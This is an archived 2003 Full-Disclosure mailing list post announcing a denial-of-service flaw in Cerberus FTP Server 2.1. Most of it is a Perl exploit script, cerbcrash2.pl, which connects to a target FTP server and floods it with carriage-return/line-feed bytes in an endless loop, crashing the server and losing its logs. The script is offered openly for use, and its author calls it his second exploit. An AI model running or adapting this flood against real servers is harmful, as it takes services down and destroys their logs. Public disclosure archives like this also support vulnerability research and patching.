lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <002e01c3a3c5$d6e0fe20$a036b850@remote>
From: florianrock at web.de (Florian Rock)
Subject: Cerberuss Crash again

Hi I found a hole in Cerberus FTP Server 2.1!
Its a DOS-Attack.
This Attack is only a floodattack and the log of the FTP is big but becaus Cerberus FTP don't save the logfile by a crash
is this Attack a problem!
I habe coded an exploit 
Its my second exploit and sorry for the bad coding
----cerbcrash2.pl----
print "/====================================================\x5c\n";
print "|  _____  _____ _     _ ______ ______  _____ _____   |\n";
print "| |  __ \x5c| ____| \x5c   / |  __  |______|| ____|  __ \x5c  |\n";
print "| | |  | ||____|  \x5c_/  | I  I |  TT   ||____| |  | | |\n";
print "| | |__| | ____||\x5c   /|| I  I |  TT   | ____| |__| | |\n";
print "| |  __  ||____|| \x5c_/ || I__I |  TT   ||____|  __  | |\n";
print "| |_|  \x5c_|_____||     ||______|  TT   |_____|_|  \x5c_\x5c |\n";
print "|                                                    |\n";
print "\x5c====================================================/\n";
print "    THE REAL REMOTER\n\n\n";


print "This is a DOSAttack against Cerberus FTP Server 2.1\n\n";

die "$usage" unless $ARGV[0] && $ARGV[1];
use Socket;
my $remote = $ARGV[0];
my $port = $ARGV[1];
my $iaddr = inet_aton($remote);
my $proto = getprotobyname("tcp");
my $paddr = sockaddr_in($port, $iaddr);
socket(SOCK, PF_INET, SOCK_STREAM, $proto);
connect(SOCK, $paddr) or die "Can't connect to " . $remote;
print "Sending exploit\n";
$msg = "\x0d\x0a";
while((CLIENT,SOCKET)){
send(SOCK,$msg, 0) or die "Server maybe down (check it)\n";
}
exit;
----end of cerbcrash2.pl----

Sorry for my bad english but i'am german
Greets
Florian Rock alias The real Remoter
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031105/331a5b0f/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ